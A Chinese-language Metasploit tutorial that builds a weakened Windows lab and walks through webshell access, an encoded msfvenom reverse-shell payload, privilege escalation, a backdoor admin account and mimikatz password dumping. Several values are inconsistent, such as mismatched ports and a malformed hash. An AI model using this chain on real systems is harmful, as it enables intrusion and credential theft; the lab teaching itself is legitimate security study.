渗透利器-kali工具 (第五章-5) Metasploit漏洞利用模块二

本文内容：

• 快速搭建有限制的测试环境
• 信息收集
• 权限提升
• 获取管理员密码

---

 

1，快速搭建有限的测试环境

　　使用phpStudy快速进行环境配置

　　phpStudy的定义是一个php调式环境的程序集成包：

　　集成Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装，无须配置即可使用，是非常方便、好用的PHP调试环境，该程序不仅包括PHP调试环境，还包括了开发工具、开发手册等。

　　下载地址：http://www.phpstudy.net

　　配置问题：http://phpstudy.php.cn/wenda/388.html

　　运行库：http://www.php.cn/xiazai/gongju/1351

　　配置漏洞测试环境：

　　　　1.新建用户www：

　　　　　　1.在计算机管理-本地用户和组-用户-新用户。

　　　　　　2.以管理员身份运行cmd，添加用户：net user www 123 /add   可以使用net user查看是否添加成功。

　　　　2.权限分配：

　　　　　　1.系统服务-打开网站根目录[上一级]：具有Apache、MySql

　　　　　　2.打开Apache文件夹，选中logs-属性-安全-编辑-添加-检查新添加用户-确定，选中-完全控制-应用。

　　　　　　3.打开MySql文件夹，选中data-属性-安全-编辑-添加-检查新添加用户-确定，选中-完全控制-应用。

　　　　3.服务设置登录用户[在系统服务下]：

　　　　　　1.如果服务不存在[Apache、Mysql]，可以在phpstudy服务管理器-安装服务。

　　　　　　2.点击Apache-属性-登录-此账户-账户：www-确定-密码：123-应用-确定。

　　　　　　3.点击MySql-属性-登录-此账户-账户：www-确定-密码：123-应用-确定。

2，信息收集：

　　目的：拿到管理员密码：

　　　　1.通过systeminfo，查看系统打了哪些补丁。

　　 　  2.通过phpMyAdmin漏洞拿到Webshell。

　　　　3.权限提升：

　　　　　　使用exp提权补丁进行提权。

　　　　　　使用MSF后渗透测试脚本提权。

3，权限提升：

　　1.快速找到exp提权补丁进行提权：

　　　　1.在线辅助网页：

　　　　　　在线比对补丁查找exp：https://bugs.hacking8.com/tiquan/　　　　

　　　　2.提权辅助工具：https://github.com/GDSSecurity/Windows-Exploit-Suggester

　　　　　　从漏洞扫描到漏洞利用：

　　　　　　　　Suggester要求：python安装xlrd。

　　　　　　　　安装xlrd：pip install xlrd --upgrade

　　　　　　先更新漏洞库：

　　　　　　　　python windows-exploit-suggester.py --update

　　　　　　扫描systeminfo信息：这个系统可以提权的补丁有哪些：

　　　　　　　　python windows-exploit-suggester.py --database 2020-05-10-mssb.xls --systeminfo sys.txt 

　　　　　　审计本地可利用漏洞信息：

　　　　　　　　python windows-exploit-suggester.py --audit -l --database 2020-05-10-mssb.xls --systeminfo sys.txt 

　　　　　　未使用补丁该系统可能存在的漏洞：

　　　　　　　　python windows-exploit-suggester.py --database 2019-09-20-mssb.xls --ostext  'Windows 7'

　　　　　　解释：

　　　　　　　　sys.txt是使用systeminfo命令查找的系统具有哪些补丁，是使用命令 systeminfo >> sys.txt写入的

　　　　　　　　在吉安频道exp提权补丁，通过Webshell管理工具，上传上去，打开终端，就可以进行提权了。

　　　　3.使用exp提权补丁创建用户[验证是否提权成功]

　　　　　　net user a a.1 /add : 添加用户并设置密码

　　　　　　net localgroup administrators a /add : 将用户加入管理组

　　2.使用MSF信息收集模块-查看提权脚本补丁：

　　　　1.创建一个基础木马[稳定会话，php会话不稳定]：

　　　　　　msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.177.128 lport=1250 -f exe > shell.exe

　　　　　　命令解释：

　　　　　　　　-p : 指定payload

　　　　　　　　lhost: 本地IP

　　　　　　　　lport: 端口

　　　　　　　　-e ：指定编码器

　　　　　　　　-i ：指定编码次数

　　　　　　　　-f ：指定文件类型

　　　　2.将保存木马文件，使用Webshell管理工具，上传上去。

　　　　3.开启监听：
　　　　　　1.监听模块：use exploit/multi/handler

　　　　　　2.查看设置选项：options [payload]

　　　　　　3.设置payload：set windows/meterpreter/reverse_tcp

　　　　　　4.查看设置选项：options[lhost、lport]

　　　　　　5.设置本机ip：set lhost 127.0.0.1

　　　　　　6.设置端口：set lport 1520

　　　　　　7.开启监听：run

　　　　4.在Web Shell管理工具，打开终端，输入：shell.exe

　　　　5.拿到回话后本地[提权]信息收集模块：

　　　　　　1.background：将会话放在后台

　　　　　　2.使用session -l 查看具有哪些会话

　　　　　　3.使用本地提权信息收集模块：use post/multi/recon/local_exploit_suggester

　　　　　　4.查看设置选项：options [session]

　　　　　　5.set session 1      [1为session会话序号]

　　　　　　6.运行：run　　查看我们可以使用哪一个提权补丁

　　　　　　7.使用提权补丁：use 提权补丁

　　　　　　8.查看设置选项：options [target]

　　　　　　9.查看具有哪些target：show targets  [target具有一个的时候，可以不用设置]

　　　　　　10.设置set target 1 [1为target序号]

　　　　　　11.开始提权：run

4，获取管理员密码：

　　1.通过mimikatz获取管理员密码：

　　　　Windows使用命令需要管理员权限：

　　　　　　mimikatz.exe log

　　　　　　mimikatz # privilege::debug

　　　　　　mimikatz # sekurlsa::logonpasswords

　　　　　　imikatz # exit

　　　　　　meterpreter >mimikatz_command -f version  //查看版本信息

　　　　　　meterpreter > mimikatz_command -f samdump::hashes //读取本地hash　　

　　　　下载地址：https://github.com/gentilkiwi/mimikatz

　　2.在线解密管理员密码：

　　　　* Domain   : WIN-06FPCJSH5P8

　　　　* LM          : 23b982a597a7a732aad3b435b51404ee

　　　　* NTLM     : 0b6fb439a176cce1fb1d34adfd9571b1c

　　　　* SHA1     : bfa75eec175e274ae355f7d0c2ed0620a89e84c5

　　　　Windows系统下的hash密码格式为：

　　　　　　用户名：RID

　　　　　　LM-HASH值

　　　　　　NT-HASH值 [存在NT，直接破解 NT]

　　　　　　LM-HASH值都是hash算法

　　　　在线解密：https://www.objectif-securite.ch/ophcrack